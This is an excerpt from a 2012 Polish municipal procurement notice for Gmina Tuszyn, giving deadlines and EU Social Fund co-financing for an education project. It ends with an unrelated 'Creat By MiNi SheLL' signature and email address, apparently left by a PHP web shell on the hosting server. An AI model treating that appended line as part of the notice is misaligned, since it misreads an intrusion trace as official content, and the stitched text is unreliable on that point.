<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2012 godzina 12:00, miejsce: Gmina Tuszyn, ul. Piotrkowska 2/4, 95-080 Tuszyn, pok. nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez  Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Priorytetu IX. Rozwój wykształcenia i kompetencji w regionach,  9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, 9.1.2. Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com